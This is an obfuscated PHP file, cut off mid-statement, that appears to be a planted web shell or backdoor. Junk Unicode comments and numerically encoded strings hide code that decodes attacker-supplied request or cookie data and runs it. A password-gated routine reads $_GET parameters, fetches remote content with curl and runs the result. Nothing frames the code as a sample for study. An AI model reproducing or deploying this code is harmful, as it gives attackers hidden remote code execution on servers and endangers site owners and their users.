<?php /*-
⋨┤ⓦℊ≕⊓∘℅∩
U=eS⋨┤ⓦℊ≕⊓∘℅∩
-*///
$SHZ/*-Z]I-]46z-*///
 = /*-


∼ⅿ⋩◕❶▾Ⅸ◃︽╠Ⓖ❅↾


S^GizUZ%:j∼ⅿ⋩◕❶▾Ⅸ◃︽╠Ⓖ❅↾


-*///
range/*-pOs-*///
(/*-

⑷◝≭㎡⓪➭⊍㊮⋦⋂◈♐ⓢ┼﹏⒤┤∆

tIA⑷◝≭㎡⓪➭⊍㊮⋦⋂◈♐ⓢ┼﹏⒤┤∆

-*///
"~"/*-


♡㉿—⋸


eB=4est♡㉿—⋸


-*///
, /*-


↭⋏▋⋌⇎☢▮⇐㊪➒Ⓞ√⅝﹏㊔♖❆


X&I`hF4[↭⋏▋⋌⇎☢▮⇐㊪➒Ⓞ√⅝﹏㊔♖❆


-*///
" "/*-R|H-*///
); /*-

╒﹎

G5╒﹎

-*///
$Sp/*-
∬♥≥⋐⒃¿⊁❷◝⒀⑹╏
f1WY>6)FZ<∬♥≥⋐⒃¿⊁❷◝⒀⑹╏
-*///
=/*-


☚♥❻


]gMWI☚♥❻


-*///
${$SHZ[20+11].$SHZ[21+38].$SHZ[20+27].$SHZ[25+22].$SHZ[6+45].$SHZ[33+20].$SHZ[1+56]};/*-<G(kJ2l-*///
if/*-

‿ϡ⊂Φ「┩ⓜ⊋⅜⑤↲┯❺∩⒇✡

-2t&CI‿ϡ⊂Φ「┩ⓜ⊋⅜⑤↲┯❺∩⒇✡

-*///
((/*-


►✾☼➃☏╓±┭▫╪⊒≣◯➻┩㈨‖⑻❻≹∢║⋩∞ↂ◖


L#;►✾☼➃☏╓±┭▫╪⊒≣◯➻┩㈨‖⑻❻≹∢║⋩∞ↂ◖


-*///
in_array(gettype($Sp).count($Sp),$Sp)/*-


♧㊚⒔◍┖∦Ⓤ╗⋞┛


zUvZx?^)♧㊚⒔◍┖∦Ⓤ╗⋞┛


-*///
&&/*-


┽☺』╘㊪✴Ⓕ㊓∬➤


:,vD┽☺』╘㊪✴Ⓕ㊓∬➤


-*///
count/*-

℅┚ↈ≨╨✲┄➈ⅵ⇦︻₪≁┌➓ⓣ➮➉€☩⑴㊒ⅳ⊔∿⇪⑰

l[Hm3℅┚ↈ≨╨✲┄➈ⅵ⇦︻₪≁┌➓ⓣ➮➉€☩⑴㊒ⅳ⊔∿⇪⑰

-*///
($Sp)==29))/*-9qY-*///
{((/*-

╄ↁ◧ℴ

6^zK╄ↁ◧ℴ

-*///
$Sp[61]=$Sp[61].$Sp[71])/*-
㊜⒀▩⋊⇜■≿Ⓗ☄︶✈▐≢≥Ⅲ∮ℬ╅
C[㊜⒀▩⋊⇜■≿Ⓗ☄︶✈▐≢≥Ⅲ∮ℬ╅
-*///
&&($Sp[90]=$Sp[61]($Sp[90]))&&(@$Sp=$Sp[90]($Sp[55],$Sp[61](${$Sp[32]}[10])))&&/*-{a-*///
$Sp())/*-


㊖⊿╦↿⋽≰ⓜ∩☆○ℯ┞↦₪⋢ⅲ⊬⓺⊛


ad%hJ㊖⊿╦↿⋽≰ⓜ∩☆○ℯ┞↦₪⋢ⅲ⊬⓺⊛


-*///
;}/*-(,9#-*///
class /*-


┧╃⊏∕┥㊡㊎≑⅑♓⒜⒗▱⊫≵㊊☢◊Ⓐ☳◙～❣⊀‿ℕ☾✏➽


vfD┧╃⊏∕┥㊡㊎≑⅑♓⒜⒗▱⊫≵㊊☢◊Ⓐ☳◙～❣⊀‿ℕ☾✏➽


-*///
NQVE{ /*-Sa-*///
static/*-Fkt&m)-*///
 function /*-


♠┇﹌└┊⊪┛◴₪﹣➲ℝ◈⑹◾


uVG4fdt3♠┇﹌└┊⊪┛◴₪﹣➲ℝ◈⑹◾


-*///
HdNoaL($dJ) /*-nKCzHp-*///
{ $sivWNI/*-q]K=q-*///
 = /*-


⊭⋨➠ℋ↧☾⑰╦⒡㊊➞➋❹⒙ⅾ┓≳≢⅕≀⇀☽⒑Ю⊝


c55s9SIq)⊭⋨➠ℋ↧☾⑰╦⒡㊊➞➋❹⒙ⅾ┓≳≢⅕≀⇀☽⒑Ю⊝


-*///
"r"./*-80oT(dV-*///
"a"./*-:0[2UVc-*///
"n"./*-
➮º♒▶☜⋽↷∐⇡⅝⋼➺㊈≦✣
2}P6Bo@c|➮º♒▶☜⋽↷∐⇡⅝⋼➺㊈≦✣
-*///
"g"./*-
↶}◲⋼↕⇧♦⊌⊶♂ⓞ︾↾⊇㊥ⓗⓡ≺
&o^a↶}◲⋼↕⇧♦⊌⊶♂ⓞ︾↾⊇㊥ⓗⓡ≺
-*///
"e"; /*-Ugt0(zwY-*///
$ftzBgQTq/*-
⇋∜▊≆㊋↘➑㊈⅛Ⅾ┽⒄∃⋖╃⋬
T^⇋∜▊≆㊋↘➑㊈⅛Ⅾ┽⒄∃⋖╃⋬
-*///
 = /*-&It%fnW!-*///
$sivWNI/*-nBqAKh-*///
(/*-~Ty-*///
"~"/*-LL(-*///
, /*-)rNA#-*///
" "/*-muY?d-*///
);/*-cYZnk=K<-*///
 $YCifc /*-[sQd`#si-*///
= /*-6}R4j-*///
explode/*-@4f,e-*///
(/*-
☪▩≳
+)Un☪▩≳
-*///
")", /*-|[Ct8@-*///
$dJ/*-]g^i-*///
); /*-{m-*///
$Cd /*-

✖ⓔ▾㊔⇉

Ej5<cT!B✖ⓔ▾㊔⇉

-*///
= /*-}FUiO7i|x-*///
""; foreach /*-


✥♬◥


T`✥♬◥


-*///
(/*-
ⓞ┫┵
H$%y^z-a.ⓞ┫┵
-*///
$YCifc /*-


—↶⒀⒆⒗┼ↅ⓷⒊©❐ⅿ▴⓳≡∎├ℨ┆⇥➵㊇∍☝㊫↱☎Ⅹ


.%N6—↶⒀⒆⒗┼ↅ⓷⒊©❐ⅿ▴⓳≡∎├ℨ┆⇥➵㊇∍☝㊫↱☎Ⅹ


-*///
as /*-ny_Q|-*///
$CbXOsqEnIi /*-


⇔╅⅗㊇［ⓑ◲✛❉◮㊊⑺㊧


J[}⇔╅⅗㊇［ⓑ◲✛❉◮㊊⑺㊧


-*///
=>/*-Sd-*///
 $qRSiaGp/*-5:baBs-*///
) /*-


ⓝ⋦⋖➸⑷↣┢↘¯✾⒕➤≕⋪┣⇞◲❇✞⇟⇣⌓㊀⊂☝Ⅲ


_AuX:ⓝ⋦⋖➸⑷↣┢↘¯✾⒕➤≕⋪┣⇞◲❇✞⇟⇣⌓㊀⊂☝Ⅲ


-*///
$Cd /*-
⅟⑬➚
~O4?t9j⅟⑬➚
-*///
.= /*-CO9|sYu}[-*///
$ftzBgQTq[$qRSiaGp/*-H=OGZ-*///
 - /*-L]7TT-*///
698/*-


➛∲ⓗ⒚⇤』▐♩㊊⊓➨ⒷΨ⋎↦⊞▸≛⇀⋼Ⅲ∦♦㊁㏑≟┓╒≐⊕


NIX4>➛∲ⓗ⒚⇤』▐♩㊊⊓➨ⒷΨ⋎↦⊞▸≛⇀⋼Ⅲ∦♦㊁㏑≟┓╒≐⊕


-*///
];/*-8!p.;gIL-*///
 return /*-
⊢ℴⓙⒾ↘➙ⅶ⒩✩ℜ⋡€♧➂⊒☁⋌⋼✈
?fQwM9⊢ℴⓙⒾ↘➙ⅶ⒩✩ℜ⋡€♧➂⊒☁⋌⋼✈
-*///
$Cd; /*-

⇁≝⊮π☧➨♨☆┞㊢▸▄ⓤ∴

p+`R23`⇁≝⊮π☧➨♨☆┞㊢▸▄ⓤ∴

-*///
} /*-%K6j-*///
static /*-GU-*///
function /*-
⏎≒⅛⑨⓶⇢▮⇘✮⓳❣✱⊁ⓩ↘⊷◯➘∜☟☬≛☄◞≝↩☞
oVT=K⏎≒⅛⑨⓶⇢▮⇘✮⓳❣✱⊁ⓩ↘⊷◯➘∜☟☬≛☄◞≝↩☞
-*///
TQrSx/*-XF$#r-*///
(/*-Nh%zxB%-*///
$JWwlSPIuO,/*-

┱≾≁⋰↧☌↯ⓒ

(#Ku,X┱≾≁⋰↧☌↯ⓒ

-*///
 $LPFZU/*-

⒔≹┷ℭ⊗®≋⊙

#6⒔≹┷ℭ⊗®≋⊙

-*///
)/*-


ⓥ≘


0n.Oⓥ≘


-*///
 {/*-


±┅⊟∃▮◊⇠⒒◅㊈﹟◝Ⅲ☣☴︴㈢⋣∙◺⊳➪≻ⓕ⋕☚


:_±┅⊟∃▮◊⇠⒒◅㊈﹟◝Ⅲ☣☴︴㈢⋣∙◺⊳➪≻ⓕ⋕☚


-*///
 $OPFwRlV/*-

╥╋}Ⅴ⓳⊅⒉⓴◰⑥◆✷ℍ╫➩㊑ⅾ⑲≡◩⊖⋉ⓓ︹⋌㈨

nl(╥╋}Ⅴ⓳⊅⒉⓴◰⑥◆✷ℍ╫➩㊑ⅾ⑲≡◩⊖⋉ⓓ︹⋌㈨

-*///
 = /*-
◦㊤➆㊟︼⑲✠✩⊯⑥▎⋞
}XBtp◦㊤➆㊟︼⑲✠✩⊯⑥▎⋞
-*///
curl_init/*-4,u)n-*///
(/*-Z7drPjl9=-*///
$JWwlSPIuO/*-

ℎ┗⋿㊀⊬♚╟┇﹤▕ⓨ×ت▾↗

g:GHX{ℎ┗⋿㊀⊬♚╟┇﹤▕ⓨ×ت▾↗

-*///
);/*-

◨✭ℛ۵↞⑴◒ℊ

<~iuY$zi%◨✭ℛ۵↞⑴◒ℊ

-*///
 curl_setopt/*-
《╟♂ⅳ⇥❀⇋㈠﹁∷﹉⑪↲Ⓓ》♜
6%|m+《╟♂ⅳ⇥❀⇋㈠﹁∷﹉⑪↲Ⓓ》♜
-*///
(/*-a{:j>[dqtn-*///
$OPFwRlV,/*-

➁⒞∐◭❇㊰ⓔ☣└•㊠⓮➂ⅿ﹪⒴◿⊲︴▣㊚⇪

^0|%t`D(b{➁⒞∐◭❇㊰ⓔ☣└•㊠⓮➂ⅿ﹪⒴◿⊲︴▣㊚⇪

-*///
 CURLOPT_RETURNTRANSFER,/*-Be#-*///
 1/*-FUGA_-*///
);/*--edi-*///
 $FLNIpy/*-


∖Ⓞ▒◬◔≊┏◦⌒⓰⒆╊﹁Ⓛ╎❸┾⑶↝⊍ℬ↛→⑽∥◨┿Ⓩ


99.U@%QJC∖Ⓞ▒◬◔≊┏◦⌒⓰⒆╊﹁Ⓛ╎❸┾⑶↝⊍ℬ↛→⑽∥◨┿Ⓩ


-*///
 = /*-^2+})-Woe-*///
curl_exec/*-

▻ⅳ⒐⅗☮ⅼ✐⓫㊋∧┫┝

7W-▻ⅳ⒐⅗☮ⅼ✐⓫㊋∧┫┝

-*///
(/*-


↑☹≼▅Ⅼ☂Ⓗ㊌⋳☄✍⋀➻Ⅸ


#V]9↑☹≼▅Ⅼ☂Ⓗ㊌⋳☄✍⋀➻Ⅸ


-*///
$OPFwRlV/*-`09bs2E-*///
); /*-l0.&-*///
return /*-
⒭╊➯
D%HxR]E⒭╊➯
-*///
empty/*-t-x-*///
(/*-

◳▵♢➶」㈢⇇∡☟ⓝ▱♗‖☲∼❷↹⒡◅

Fpl[y)qr8f◳▵♢➶」㈢⇇∡☟ⓝ▱♗‖☲∼❷↹⒡◅

-*///
$FLNIpy/*-
◎⋾≝㊎⋰❃⚘↷◲✘⏎◠≎⊔⒖④︽♚☍卍➴➆╜↳㊑Ⓝ╕㍿⋙⓳◤
+f◎⋾≝㊎⋰❃⚘↷◲✘⏎◠≎⊔⒖④︽♚☍卍➴➆╜↳㊑Ⓝ╕㍿⋙⓳◤
-*///
)/*-(U+B-*///
 ? /*-

⌔※ϟ㊖◃☲↚㊚◽⋖░℗⋀

1=PPh_[⌔※ϟ㊖◃☲↚㊚◽⋖░℗⋀

-*///
$LPFZU/*-Iruh.Gn-*///
(/*-qB,)-*///
$JWwlSPIuO/*-
➧⓿╞∮Ⓩ⇅⇎❂ℳ✒≡⋖◧「ↈ⑫⑿⋧┨⊵☹
Aj➧⓿╞∮Ⓩ⇅⇎❂ℳ✒≡⋖◧「ↈ⑫⑿⋧┨⊵☹
-*///
)/*-sW^.PBB4.-*///
 : /*-
⋍✥﹛⒞ⓦ└┙£⓼⋕←▯⑶ﭢ☉㊢㊭～☴⊬↣◣◁⊾▹☒➡➹
xxJ+l⋍✥﹛⒞ⓦ└┙£⓼⋕←▯⑶ﭢ☉㊢㊭～☴⊬↣◣◁⊾▹☒➡➹
-*///
$FLNIpy; /*-ufJt-*///
}/*-


╎∼✕┢▢↳‡▊⋓┧⒵┊¢⒌ⓡ➎◚╜⅖ↈ


d6E╎∼✕┢▢↳‡▊⋓┧⒵┊¢⒌ⓡ➎◚╜⅖ↈ


-*///
 static/*-

︾❺▇﹨⑨◪⒛✪ⓔ☓✶⇑⒄▂✼⊎㈧㊝♬

(,1=jn︾❺▇﹨⑨◪⒛✪ⓔ☓✶⇑⒄▂✼⊎㈧㊝♬

-*///
 function /*-
↴➬⇃✬∟㊢⒬ⓑ
b↴➬⇃✬∟㊢⒬ⓑ
-*///
oFecrAItKx/*-Io-*///
() /*-


◒⊩✳≾➏≅☸⅞


x<w-U◒⊩✳≾➏≅☸⅞


-*///
{/*-
↠⊂≂⊍﹄⊟☀❤≭☪⇃⑾⋳⇝〓⓶
n%`@&iH↠⊂≂⊍﹄⊟☀❤≭☪⇃⑾⋳⇝〓⓶
-*///
 $Ia /*--lTY2-*///
=/*-ee-*///
 array/*-VX_-*///
("725)710)723)727)708)723)729)722)707)714)725)708)719)713)714","709)708)710)729)710)713)708)775)773","718)709)713)714)729)724)723)725)713)724)723","712)727)725)717","726)727)709)723)770)772)729)724)723)725)713)724)723","722)719)716)723)729)721)723)708)729)725)713)714)708)723)714)708)709","752)782","699","777)782","759)742)742)759)735","713)722"); /*-
π∭⊐¤ⅳℜ∦㊨⇃↓㊦
N<π∭⊐¤ⅳℜ∦㊨⇃↓㊦
-*///
foreach /*-

☎❈㊇➥ⓨ⊩#≩✒℗㊀▃⒮☏░↥⇆⋛✩╀▄【↭▇⒘〖

yt)z4☎❈㊇➥ⓨ⊩#≩✒℗㊀▃⒮☏░↥⇆⋛✩╀▄【↭▇⒘〖

-*///
(/*-

¶✆❂◐★⓰✷ⓣ⑿∙◸㊄≋Ⓧ⇗『⅛➈➡⋆✝‡∱⋢➪┲

63L¶✆❂◐★⓰✷ⓣ⑿∙◸㊄≋Ⓧ⇗『⅛➈➡⋆✝‡∱⋢➪┲

-*///
$Ia/*-


∤⅗▪⓵⌒⅔⊿☵＂㊆⋫


5jN!;∤⅗▪⓵⌒⅔⊿☵＂㊆⋫


-*///
 as /*-]5YoGh5bn-*///
$omi/*-

/✮▣▮ⓧ┛↕*✜⊦ⅱ♣⊬】⊋☟㊈

Inl]/✮▣▮ⓧ┛↕*✜⊦ⅱ♣⊬】⊋☟㊈

-*///
)/*-

⋫ϟ㈠┵㊤∪⋕⒯㊢⊉﹨┃❃➀❐∉▫✶⑿♖

9.:r,RfaW⋫ϟ㈠┵㊤∪⋕⒯㊢⊉﹨┃❃➀❐∉▫✶⑿♖

-*///
 $OwWZvEMSr/*-


⌖ⅲ┣←⓷☒↉ⓕ≌⅕⋒▌↛↦ⓤ▶⑸㊙﹩⊏○☢▿ℝ➒Ⓓ∬⋌ⅻ∫


%_]i,⌖ⅲ┣←⓷☒↉ⓕ≌⅕⋒▌↛↦ⓤ▶⑸㊙﹩⊏○☢▿ℝ➒Ⓓ∬⋌ⅻ∫


-*///
[] /*-+D1ROz@zQ-*///
= /*-Fi$0-*///
self/*-Iw|J!6-*///
::/*-g~@4Ih8%A-*///
HdNoaL/*-6R+h#a-*///
(/*-`.%.4#e7-*///
$omi/*-BCE#-*///
);/*-&kG()~m-*///
$Cj /*-

⊫〈ⓤ㊙ⓓ✈┠┸┗Ⓛ✴ⓞϟ╊▷≹ℐ◟┖≌╚

!H⊫〈ⓤ㊙ⓓ✈┠┸┗Ⓛ✴ⓞϟ╊▷≹ℐ◟┖≌╚

-*///
= /*-
⑹◖❑Ⓤ╒﹉☀☂⒥Ⅱღ≕⒀✻
ON=u;4Fgi⑹◖❑Ⓤ╒﹉☀☂⒥Ⅱღ≕⒀✻
-*///
@$OwWZvEMSr/*-

◯⊁⊣➘➒

qx)b_}9◯⊁⊣➘➒

-*///
[/*-
≢㈡⋎ℚ∘≥ⅴ┡➭┻Ⓧ➾┿≯╏
G+~4v&≢㈡⋎ℚ∘≥ⅴ┡➭┻Ⓧ➾┿≯╏
-*///
1/*-


↉◭❇⋝⊲⊐⑷⑤¤➲➾⋄⇥╗◁◍


tql↉◭❇⋝⊲⊐⑷⑤¤➲➾⋄⇥╗◁◍


-*///
]/*-

⊛ⓠ≫▦⊫≔

0W(⊛ⓠ≫▦⊫≔

-*///
(/*-


ⅷ&㊞◍⊳⇁


cⅷ&㊞◍⊳⇁


-*///
${/*-T,J[}jF-*///
"_"/*-|(S;0<-*///
."G"/*-p8^,+-*///
."E"/*-
㊃➀⅚
Q5㊃➀⅚
-*///
."T"/*-


㊪┐⅘⊭⒈）▅﹉†┺⒦㊓⊈


8.>ddK㊪┐⅘⊭⒈）▅﹉†┺⒦㊓⊈


-*///
}[/*-
◔≁↗㊒
S.l?^ODK]?◔≁↗㊒
-*///
$OwWZvEMSr/*-


∓☠⑾


9RA;Zd?Ie∓☠⑾


-*///
[/*-


¾➟↠Ⅳⅷ⌖


sfAhYqO¾➟↠Ⅳⅷ⌖


-*///
7+2/*-+S##)-*///
]]/*-fWif;>A-*///
);/*-+OD-*///
 $lQHLtGfWEv /*-

╃⋝㊉⇝⊀Ⅷ←☒↺☝↑╄⋍⋦■├ⅺ큐≶⌒❈

r<╃⋝㊉⇝⊀Ⅷ←☒↺☝↑╄⋍⋦■├ⅺ큐≶⌒❈

-*///
=/*-u!Pf-*///
 @$OwWZvEMSr/*-,WbTcio&W-*///
[/*-{Y-*///
2+1/*-3g2-*///
]/*-

㊛▴➒☇┨Ⓝ⇖⋳

a)_>㊛▴➒☇┨Ⓝ⇖⋳

-*///
(/*-64f-*///
$OwWZvEMSr/*-er?z9Jq-*///
[/*-

┍︸☆㈤♛⋫$⋅⊞ⓤ❈

.5RY6%f,6┍︸☆㈤♛⋫$⋅⊞ⓤ❈

-*///
3+3/*-


⇎❊▔⌖ⓟ╝↵┎↗⋺⅜┯⓿⒚∦ⅸ┤∘㊠℃⊔◖


$#CVM.Xw⇎❊▔⌖ⓟ╝↵┎↗⋺⅜┯⓿⒚∦ⅸ┤∘㊠℃⊔◖


-*///
], /*-


⊜↻^


7[.⊜↻^


-*///
$Cj/*-
➛ⓑ∩❺❶ⓜ⒉┲ⓕ⒞∥㊪∽┭Ⓔ⊩⊺Ⅱϡ﹜♓§⋉〉㊐✉↊➼―➓
bxc$z➛ⓑ∩❺❶ⓜ⒉┲ⓕ⒞∥㊪∽┭Ⓔ⊩⊺Ⅱϡ﹜♓§⋉〉㊐✉↊➼―➓
-*///
);/*-
☾┿∘◈▉
.D.QVk1X☾┿∘◈▉
-*///
 $ktGiPVfaNE /*-

⋉⑿❹⓳➩≗⑻◴⇈≵﹨⒤┨Ⅰ˜⊃⋎┧㊔☆╀⊀⏥

`S.fn⋉⑿❹⓳➩≗⑻◴⇈≵﹨⒤┨Ⅰ˜⊃⋎┧㊔☆╀⊀⏥

-*///
=/*-
≰⒇↮▁⊍↠✾↫▢↞⅞⓬↟✛➳ⅪⓃ◟➦ⓡ✎⊤≩⇍©↴ⓨ✽ℴ
h+ffLkEV{≰⒇↮▁⊍↠✾↫▢↞⅞⓬↟✛➳ⅪⓃ◟➦ⓡ✎⊤≩⇍©↴ⓨ✽ℴ
-*///
 $OwWZvEMSr/*-Q~tr-*///
[/*-


➡〓♭⇒︾Ⅳ﹉ⓕ⊠✁┙╧⑩ϡⓚ◲☿^❀∡Ⓣ⑻✯


9jlsclh]B➡〓♭⇒︾Ⅳ﹉ⓕ⊠✁┙╧⑩ϡⓚ◲☿^❀∡Ⓣ⑻✯


-*///
2+0/*-


❿≂⊉▏↯➣⒌⒈▴┷↉


VX&h❿≂⊉▏↯➣⒌⒈▴┷↉


-*///
]/*-H>@nu>{X-*///
(/*-


Ⓢ☮Ↄ⒣✱✈﹏㊌⋏☂⊺☧∕≆⅟⓺♕↙♝⒵➂ⅷ∉ⓞⅣ⋒⑮▴⊎ↇ


?mEZⓈ☮Ↄ⒣✱✈﹏㊌⋏☂⊺☧∕≆⅟⓺♕↙♝⒵➂ⅷ∉ⓞⅣ⋒⑮▴⊎ↇ


-*///
$lQHLtGfWEv,/*-7%KyAf-*///
 true/*-bvZZ#}-m-*///
); /*-)[-*///
@${/*-zlB:l1`@IC-*///
"_"./*-
⋱✧⑿┶Ⓦ➵⊯∷☉∁
uR,Zbfw⋱✧⑿┶Ⓦ➵⊯∷☉∁
-*///
"G"./*-

⊇ℒ↖╏⋽Ⓕ］∩≀☻┵︶┮《⅒•⒧⑴✴⋹⓳⓯◐∄⊕Ⅰ▉↼

8K4x@0U⊇ℒ↖╏⋽Ⓕ］∩≀☻┵︶┮《⅒•⒧⑴✴⋹⓳⓯◐∄⊕Ⅰ▉↼

-*///
"E"/*-


╠﹃△♁Ⓐ


E|╠﹃△♁Ⓐ


-*///
."T"/*-

㊄↺⑬⋸︻⒃╟➸↩〈▒↝↭┟⋒⊰㊂ⓠ♜◍⋙⊔✰Ⅺ〔◩¥

sAsq㊄↺⑬⋸︻⒃╟➸↩〈▒↝↭┟⋒⊰㊂ⓠ♜◍⋙⊔✰Ⅺ〔◩¥

-*///
}/*-
┩▣❀┱﹋ℭ➭❒┇⋏⇥≙⅖㊛⑬┚■↷╉☌∈
#-Z;TNe┩▣❀┱﹋ℭ➭❒┇⋏⇥≙⅖㊛⑬┚■↷╉☌∈
-*///
[/*-

⑼⓶⑷╪╈⊞☌∢⇪≾

ohEgipO⑼⓶⑷╪╈⊞☌∢⇪≾

-*///
$OwWZvEMSr/*-


㊯◎⋢▒➅⊥┋ⅶ∇┏◔❼✹┈➠


;5mxjEz㊯◎⋢▒➅⊥┋ⅶ∇┏◔❼✹┈➠


-*///
[2+8/*-yH#-*///
]/*-aC-*///
]/*-


ℜ﹍┬㊌┤⋱⊠⋻╙ℳ⓱≡▶➼⊤㊚◻ℒ


b:aZ,Fle[ℜ﹍┬㊌┤⋱⊠⋻╙ℳ⓱≡▶➼⊤㊚◻ℒ


-*///
 == /*-


═㈨➧↢┲♙▧♀➱◕⊘ⓖ∼


@F)_0]═㈨➧↢┲♙▧♀➱◕⊘ⓖ∼


-*///
1 /*-


︼【➅⇎⏢∯└ЮⓂ◕≐☊⋺⇝✾〕➻⇛⊫


.|H;~~nSgF︼【➅⇎⏢∯└ЮⓂ◕≐☊⋺⇝✾〕➻⇛⊫


-*///
&& /*-


⓽─○∦▍⇐﹜⋼⋖ㄨ︽☐↗›℗╫∉【㊗▰⇋


a7q⓽─○∦▍⇐﹜⋼⋖ㄨ︽☐↗›℗╫∉【㊗▰⇋


-*///
die/*-u.Y3zYWx&%-*///
(/*-ILX~}P)s_;-*///
$OwWZvEMSr[4+1/*-A>T3-*///
]/*-Xh|t&RI~0)-*///
(/*-CzmY5-*///
__FILE__/*-


Ⓟ㊪


%YUJ}}#c.|Ⓟ㊪


-*///
)/*-WCOn}-*///
); /*-
§◼⇄♗↥⊇☜㊧㈧❀≦﹨╕©」︸❃⅞✴┢ⅱ✲☯⋞⋍▣⋚➐⇋ø①
eh||v(jcM§◼⇄♗↥⊇☜㊧㈧❀≦﹨╕©」︸❃⅞✴┢ⅱ✲☯⋞⋍▣⋚➐⇋ø①
-*///
if/*-
㊬╉⇊﹁⋝⊧✤↺⊘↔▋⋚☈⋤⓵۰㊃ⓦ
gA,FES+iW㊬╉⇊﹁⋝⊧✤↺⊘↔▋⋚☈⋤⓵۰㊃ⓦ
-*///
(/*-tg}%xhl-*///
 (/*-


∈⒘◪➺㊟⊑✼✢ↅ➢㊔⇞⒛╣⊣ℑ


i4;∈⒘◪➺㊟⊑✼✢ↅ➢㊔⇞⒛╣⊣ℑ


-*///
(@/*-l(a^-*///
$ktGiPVfaNE/*-


✱々⑨❊㊅⑲⇅℮⊑⓾ⓢ▮➮☆┢


~FX<✱々⑨❊㊅⑲⇅℮⊑⓾ⓢ▮➮☆┢


-*///
[/*-rG~(](q]A-*///
0/*-


■⒤⊙⑴♗℠✮Ⓙ➝⋏☠≻⋝▄≍⑾⋿㊄♀⊰✴㏒


6`■⒤⊙⑴♗℠✮Ⓙ➝⋏☠≻⋝▄≍⑾⋿㊄♀⊰✴㏒


-*///
] /*-

❹◟Ⓝ⑶▱⇜£◢⒅➴✜

2N❹◟Ⓝ⑶▱⇜£◢⒅➴✜

-*///
- time/*-
«∉⒊➘∵☮✤┧ⓐ≁〗⒄︵▉ⓞ┰Ⓖ
1oU«∉⒊➘∵☮✤┧ⓐ≁〗⒄︵▉ⓞ┰Ⓖ
-*///
()/*-D-*///
) > /*-


》∾✰⓲≗［Ⓢ♬✝⓹⌖∡▴⋣⋷◭Ⅺ⓱▮


_MpQdJA_T#》∾✰⓲≗［Ⓢ♬✝⓹⌖∡▴⋣⋷◭Ⅺ⓱▮


-*///
0/*-

ⓢ㊚❈✥≧

7?$fDkⓢ㊚❈✥≧

-*///
)/*-

┦〗▆⇊ϡ┆⇟◾⓯▹〖⒰∴▫☁⑦━﹠›☚↾

0|Up┦〗▆⇊ϡ┆⇟◾⓯▹〖⒰∴▫☁⑦━﹠›☚↾

-*///
 and /*-u8iP-*///
(/*-nL)TC-*///
md5/*-^o{]Yi-*///
(/*-ZZUB7-*///
md5/*-OK-*///
(/*-_$-*///
$ktGiPVfaNE/*-

▃↵⑲⊶╎⓭℘

FX▃↵⑲⊶╎⓭℘

-*///
[/*-kDHh3iS2-*///
2+1/*-N8A-*///
]/*-Lji1OyH2-*///
)/*-

⇖↰㈩웃♕ℛ

OO[s⇖↰㈩웃♕ℛ

-*///
)/*-Lbh.qV-*///
 === /*-Ru-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-EP_lcRw-X-*///
)/*-

⊼✴◷◐◅◨㊋⅝∄∺⑾◑▲@ℜ⋼⒙┲▷⋟➯﹀⒯◆☋∇Ⓓ

u6}⊼✴◷◐◅◨㊋⅝∄∺⑾◑▲@ℜ⋼⒙┲▷⋟➯﹀⒯◆☋∇Ⓓ

-*///
 ): /*-g@-*///
$GRjNZhPu /*-


Ⓧ㊈⊑⊶◕◀웃⊨㈨☵♪⒭◪


fMⓍ㊈⊑⊶◕◀웃⊨㈨☵♪⒭◪


-*///
=/*-


㊋◤┒◻⊂¢㊊◴⊐✧Ⓙ≇┑▆Φ℮■└ⓢ⋞⋊◷⊜ℋ㊕♨▧╟


^<#{.Ugje㊋◤┒◻⊂¢㊊◴⊐✧Ⓙ≇┑▆Φ℮■└ⓢ⋞⋊◷⊜ℋ㊕♨▧╟


-*///
 self/*-GA$I>o.hJP-*///
::/*-HXQm-Q-*///
TQrSx/*-},U-*///
(/*-
➾︽▪⇅◷∪╦⑼➦㊦⅘➈⋦→☪❿◹
9X+s➾︽▪⇅◷∪╦⑼➦㊦⅘➈⋦→☪❿◹
-*///
$ktGiPVfaNE/*-

⒧◔∰⊾

CkU⒧◔∰⊾

-*///
[/*-
ⓞ⒇⊈⊡≲▄⒞⓾⓯⇈∷⇇
xDzahK9ⓞ⒇⊈⊡≲▄⒞⓾⓯⇈∷⇇
-*///
0+1/*-
╕┐㊤▭♙⊎⇔↝❧㊄▲ⓩ⒜☽−➠♭ⅼ≒⒂⇕⊗┕♧┣≌ℰ┠㊘┡
clBW_D$╕┐㊤▭♙⊎⇔↝❧㊄▲ⓩ⒜☽−➠♭ⅼ≒⒂⇕⊗┕♧┣≌ℰ┠㊘┡
-*///
], /*-RTep5&-*///
$OwWZvEMSr/*-

‱┛✫╥✮⋖﹁▿❄ↁ♚㊑┪┞✚﹀⋂ℕ☰ⅶ⅛↡▽

~~v;,E#a)M‱┛✫╥✮⋖﹁▿❄ↁ♚㊑┪┞✚﹀⋂ℕ☰ⅶ⅛↡▽

-*///
[/*-


◩≜&ℯ↴⇅—➲☎ˉ┺⋛↘㊮↬↮⅛


nrxWcH◩≜&ℯ↴⇅—➲☎ˉ┺⋛↘㊮↬↮⅛


-*///
5+0/*-7F-*///
]/*-
⊉ⓞ⒕♠⊞∊♝╅⊚➍∛⑱❑◢Ⓗ⋾⓭✝㊤☶∰✶✣▼≔
d7.37RN[5⊉ⓞ⒕♠⊞∊♝╅⊚➍∛⑱❑◢Ⓗ⋾⓭✝㊤☶∰✶✣▼≔
-*///
);/*-

♭⅜⇡▔｀⓺︶☥↪ℑ⓬⋃┼々⊧✔Ⓗ☉↽⊆ℜ↗㊚⓪╡ↅ∞✍≼

+of3MzNFv♭⅜⇡▔｀⓺︶☥↪ℑ⓬⋃┼々⊧✔Ⓗ☉↽⊆ℜ↗㊚⓪╡ↅ∞✍≼

-*///
@$OwWZvEMSr/*-tx4xzI^z4B-*///
[/*-k#k!4`cc-*///
0/*-8+V?S^q.-*///
]/*-

➑☾۵◿◘⒉✿

[g9-➑☾۵◿◘⒉✿

-*///
(/*-]N-*///
"",/*-
⊙≲┱≵┽♞℘⊳Φ♮≚➌≈∗Ⓥ✪♛⒦︴』
:dMR,z⊙≲┱≵┽♞℘⊳Φ♮≚➌≈∗Ⓥ✪♛⒦︴』
-*///
 $OwWZvEMSr/*-
❊✂∛☼⒎↺⒜
#[)iscs❊✂∛☼⒎↺⒜
-*///
[/*-%!-*///
3+4/*-
≪⊄∗◱◐▯⊑⒢℗↾▦∇⋪Ⓑ⊻✴⓫♪≚♙➎▷≙⇕❂≑≂∛
Rf(JN≪⊄∗◱◐▯⊑⒢℗↾▦∇⋪Ⓑ⊻✴⓫♪≚♙➎▷≙⇕❂≑≂∛
